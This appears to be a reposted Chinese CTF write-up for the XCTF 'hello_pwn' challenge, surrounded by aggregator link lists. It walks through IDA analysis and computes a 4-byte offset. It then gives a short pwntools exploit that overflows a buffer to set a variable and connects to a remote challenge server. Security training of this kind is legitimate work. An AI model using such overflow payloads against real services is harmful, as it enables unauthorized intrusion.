xctf-pwn hello_pwn

其他 2020-03-22 00:01:01 阅读次数: 0

走流程，看看文件类型

64位，开了个NX

直接丢IDA分析

查看sub_400686()

是个给flag的函数，可以看到，只要满足if语句的条件使dword_60106C == 1853186401就可以得到flag。

计算偏移量

0x6C-0x68=0x4所以偏移量是4，简单的覆盖变量接下来就直接写exp了

扫描二维码关注公众号，回复： 10038353 查看本文章

exp：
from pwn import*
p = remote('111.198.29.45',32077)
payload='a'*4+p64(0x6E756161) //1853186401转成了16进制（不转也行）
p.recvuntil("lets get helloworld for bof\n")
p.sendline(payload)
p.interactive()

猜你喜欢

转载自www.cnblogs.com/remon535/p/12543422.html

xctf-pwn hello_pwn

XCTF-PWN welpwn

hello_pwn

xctf-pwn 之string

XCTF hello_pwn write up

nuaactf hello_pwn writeup

攻防世界 | hello_pwn

攻防世界--hello_pwn

攻防世界—pwn—hello_pwn

xctf-pwn 之guess_num

xctf-pwn level3

pwn学习（1）攻防世界-hello_pwn

XCTF-PWN新手区通关手册

XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)

[CTF-PWN]攻防世界新手村-hello_pwn[wp]

hello pwn

[pwn] - xctf题目wp

XCTF PWN level3

hello_pwn--writeup

攻防世界-PWN-hello_pwn

XCTF pwn-100(使用DynELF)

攻防世界XCTF新手区pwn

pwn

攻防世界_pwn_hello_pwn(萌新版)

XCTF - pwn when_did_you_born - WP

xctf pwn高手进阶题之stack2

xctf高手进阶题之pwn-100

xctf pwn 新手练习题总结

XCTF PWN高手进阶区之JS

【PWN系列】XCTF-4-ReeHY-main-100 Writeup

今日推荐

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

周排行

[编程题]学英语

[codeforces 1288A] Deadline 约数+模

Python的web开发

Docker在Centos 7上的部署

python编码

解决Ubuntu16.04 fatal error: json/json.h: No such file or directory

mysql并发插入

rest接口如何适应jsonp的方案

linux 终端上网设置

高数——等号两边同时求导、积分的解释

每日归档

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)